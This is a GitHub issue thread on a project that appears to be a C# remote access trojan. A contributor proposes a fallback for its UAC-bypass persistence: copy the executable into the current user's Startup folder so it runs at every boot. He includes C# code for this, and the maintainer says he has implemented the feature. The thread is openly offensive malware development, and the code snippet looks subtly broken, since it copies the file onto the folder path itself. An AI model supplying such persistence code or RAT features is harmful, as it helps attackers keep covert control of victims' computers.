### ISSUE TITLE
Not really a issue more of a recommendation

### ISSUE THREAD

**Issue by ragekillen** [AdvancedHacker101/C-Sharp-R.A.T-Server#4]
When using persistence UAC bypass it requests you upload files to the exe directory, what you should do is use `string a = Application.StartupPath;` then pass that info back to the server and begin a automatic transfer.  You could also add a loading bar to indicate the progress of the bypass. 

**IF BYPASS FAILS**
Wrap the bypass statement in a try catch, If for some unknown reason the bypass fails it  #will just add a copy of the exe to the current user startup path (Not protected by UAC) so either way it will boot with system.

**code for the catch**
```
if(File.Exists(Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "/tutClient.exe"))
{
}
else
{
File.Copy(Application.ExecutablePath, Environment.GetFolderPath(Environment.SpecialFolder.Startup));
}
```

Reason I added the if statement inside the catch is it wont throw a error if the file already exists in the startup folder, you can either use that method or nest the try catch statements

**Comment by AdvancedHacker101** [comment]
Hi!
**Thank you** for contribution! :+1: 
I'm currently on vaction, but once i get back home to my development PC, i will definitely check it out!
I go back home in a week or so.
Then it will take maybe a couple of days to implement this.
**Advanced Hacking 101**

**Comment by AdvancedHacker101** [comment]
Hi!  
I know this is a really late response but I implemented this functionality.  
I'm just busy with school and BS.  
Anyways, feature added in this commit:  
https://github.com/AdvancedHacker101/C-Sharp-R.A.T-Client/commit/8b06f4626c7d155f6c15fb610f73cb82844d2b2f
